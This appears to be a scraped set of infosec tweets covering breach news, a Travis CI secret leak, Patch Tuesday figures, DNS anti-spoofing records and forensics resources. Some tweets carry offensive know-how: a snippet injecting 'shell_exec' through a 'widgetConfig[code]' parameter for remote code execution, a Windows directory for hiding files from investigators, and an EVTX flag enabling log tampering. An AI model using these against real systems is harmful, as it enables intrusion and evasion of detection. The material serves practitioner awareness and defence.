Here is one of my latest paths to Domain Admin 😈 it took ~2h30 (I was relying on network traffic that was not so present at the beginning)
This path was a bit long and involved NTLM, Kerberos, network protocols, credential dump, etc 👁️👅👁️
[12 steps detailed below 🧵]
https://t.co/Tp6AcXavUW has been breached. Visiting the website displays the classic 'double your money' scam. The scammers have profited (as of this writing) roughly $17,000.
#Bitcoin
Between the 3 Sept and 10 Sept, secure env vars of *all* public @travisci repositories were injected into PR builds. Signing keys, access creds, API tokens.
Anyone could exfiltrate these and gain lateral movement into 1000s of orgs. #security 1/4
https://t.co/i23jFzAjjH
Our latest blog post explores vulnerabilities and possible Apple copyright violations in Cellebrite's software:
"Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective"
https://t.co/DKgGejPu62
Microsoft Patch Tuesday is a doozy this month:
- 114 documented CVEs
- 4 critical MS Exchange Server vulns
- 2 pre-auth code execution vulns found by NSA
- 1 in-the-wild 0day found by Kaspersky ninja @oct0xor
- 0 Pwn2Own bugs fixed
https://t.co/JYDa2Jd7nv
If you as unpriv user wanna hide something a place where:
Only SYSTEM can do directory listing
Survives windows reinstall
Is not indexed
Normally never looked at
Is outside you profile directory
Never emptied
C:\SYSTEM~1\ClientRecoveryPasswordRotation
Is for you
If you have domains that you're not using for email, please set up DNS records to prevent spammers from using them.
. TXT "v=spf1 -all"
. MX . 0
_dmarc. TXT "v=DMARC1; p=reject;"
Undocumented (what a surprise!) EVTX file format flag, making all internal checksums ignored.
Good to have if you plan to manipulate the log content.🕵️
Simple "try this at home" #PowerShell script: https://t.co/Z8CYLPM9Lo
Canary Tokens
an elegant way to get notifications (email, web hook) when 💩 has hit the fan
Blog
https://t.co/lKtUdNHRwU
Service
https://t.co/vCzVG0O03i
@q_vault I'd advise some care with those examples. They do not include integrity or authenticity checks which can lead to serious vulnerabilities.
(Examples in a shameless self plug: https://t.co/hVG05ZeoDw )
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = https://t.co/M3twJzzDVb(url = sys.argv[1], data = params)
-------
Still stupidity or already a backdoor?
A new Introduction to Memory Forensics episode was released yesterday, and a follow-up to that video covering #YARA is coming soon. Check out https://t.co/9KV4wPjtzu or visit https://t.co/GzZGfU1AWD for a complete guide to all content. #DFIR#forensics#malware#memoryforensics
commando-vm : Complete Mandiant Offensive VM (Commando VM), the first full Windows-based penetration testing virtual machine distribution : https://t.co/nZoU9fFV53
Details : https://t.co/zxP0itpqTT